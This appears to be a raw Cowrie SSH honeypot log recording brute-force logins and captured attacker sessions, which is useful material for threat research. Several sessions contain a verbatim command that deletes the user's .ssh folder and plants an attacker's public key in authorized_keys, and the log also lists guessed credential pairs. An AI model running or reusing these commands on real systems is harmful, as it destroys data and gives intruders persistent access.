{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:18:23.992438Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:18:24.077195Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:24.078121Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41060,"dst_ip":"1.2.3.4","dst_port":22,"session":"47c62e83fd36","protocol":"ssh","message":"New connection: 212.227.235.229:41060 (1.2.3.4:22) [session: 47c62e83fd36]","sensor":"my-vps","timestamp":"2025-08-31T05:18:24.179261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:24.179920Z","src_ip":"212.227.235.229","session":"47c62e83fd36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:24.272186Z","src_ip":"212.227.235.229","session":"47c62e83fd36"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:24.682142Z","src_ip":"212.227.235.229","session":"47c62e83fd36"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:25.776672Z","src_ip":"212.227.235.229","session":"47c62e83fd36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58252,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce640c8e703d","protocol":"ssh","message":"New connection: 212.227.235.229:58252 (1.2.3.4:22) [session: ce640c8e703d]","sensor":"my-vps","timestamp":"2025-08-31T05:18:25.866570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:25.867668Z","src_ip":"212.227.235.229","session":"ce640c8e703d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:25.958465Z","src_ip":"212.227.235.229","session":"ce640c8e703d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:18:26.362839Z","src_ip":"212.227.235.229","session":"ce640c8e703d"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:26.446501Z","src_ip":"212.227.235.229","session":"1ee421f8096f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:26.455168Z","src_ip":"212.227.235.229","session":"ce640c8e703d"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345","message":"login attempt [test/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:26.528973Z","src_ip":"212.227.235.229","session":"cb6c01c7d8ac"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:28.306651Z","src_ip":"212.227.235.229","session":"cb6c01c7d8ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50234,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f9dc4b9f798","protocol":"ssh","message":"New connection: 212.227.235.229:50234 (1.2.3.4:22) [session: 9f9dc4b9f798]","sensor":"my-vps","timestamp":"2025-08-31T05:18:37.767038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:37.768254Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:38.028054Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.login.success","username":"root","password":"Root1234#","message":"login attempt [root/Root1234#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:18:39.053372Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:18:39.578469Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:18:39.579260Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:18:39.580348Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:39.838613Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:18:40.831577Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:18:40.832283Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:18:41.090231Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:41.091160Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51674,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b995127ce9c","protocol":"ssh","message":"New connection: 212.227.235.229:51674 (1.2.3.4:22) [session: 3b995127ce9c]","sensor":"my-vps","timestamp":"2025-08-31T05:18:41.361177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:41.364926Z","src_ip":"212.227.235.229","session":"3b995127ce9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41344,"dst_ip":"1.2.3.4","dst_port":22,"session":"740a046f1656","protocol":"ssh","message":"New connection: 212.227.125.160:41344 (1.2.3.4:22) [session: 740a046f1656]","sensor":"my-vps","timestamp":"2025-08-31T05:18:41.510898Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:41.631352Z","src_ip":"212.227.235.229","session":"3b995127ce9c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:18:42.055107Z","src_ip":"212.227.125.160","session":"740a046f1656"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:18:42.055798Z","src_ip":"212.227.125.160","session":"740a046f1656"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:42.707081Z","src_ip":"212.227.235.229","session":"3b995127ce9c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:43.983752Z","src_ip":"212.227.235.229","session":"3b995127ce9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53020,"dst_ip":"1.2.3.4","dst_port":22,"session":"b95023fdae6c","protocol":"ssh","message":"New connection: 212.227.235.229:53020 (1.2.3.4:22) [session: b95023fdae6c]","sensor":"my-vps","timestamp":"2025-08-31T05:18:44.228847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:44.232024Z","src_ip":"212.227.235.229","session":"b95023fdae6c"}
{"eventid":"cowrie.login.failed","username":"test","password":"12345","message":"login attempt [test/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:44.250964Z","src_ip":"212.227.125.160","session":"740a046f1656"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:44.489468Z","src_ip":"212.227.235.229","session":"b95023fdae6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55450,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee130ea32a1d","protocol":"ssh","message":"New connection: 212.227.125.160:55450 (1.2.3.4:22) [session: ee130ea32a1d]","sensor":"my-vps","timestamp":"2025-08-31T05:18:44.959390Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:18:45.497501Z","src_ip":"212.227.235.229","session":"b95023fdae6c"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:45.747247Z","src_ip":"212.227.125.160","session":"740a046f1656"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:45.756230Z","src_ip":"212.227.235.229","session":"b95023fdae6c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:45.757013Z","src_ip":"212.227.235.229","session":"9f9dc4b9f798"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55059,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dbad58b7770","protocol":"ssh","message":"New connection: 212.227.235.229:55059 (1.2.3.4:22) [session: 7dbad58b7770]","sensor":"my-vps","timestamp":"2025-08-31T05:18:48.203568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:18:48.225731Z","src_ip":"212.227.235.229","session":"7dbad58b7770"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:18:48.398189Z","src_ip":"212.227.235.229","session":"7dbad58b7770"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:51.349309Z","src_ip":"212.227.125.160","session":"88bcd5d25b77"}
{"eventid":"cowrie.login.failed","username":"frappe","password":"frappe12345","message":"login attempt [frappe/frappe12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:18:57.096843Z","src_ip":"212.227.235.229","session":"7dbad58b7770"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:18:58.568863Z","src_ip":"212.227.235.229","session":"7dbad58b7770"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":14376,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8af61695e90","protocol":"ssh","message":"New connection: 80.94.95.112:14376 (1.2.3.4:22) [session: a8af61695e90]","sensor":"my-vps","timestamp":"2025-08-31T05:18:58.606390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T05:18:58.607579Z","src_ip":"80.94.95.112","session":"a8af61695e90"}
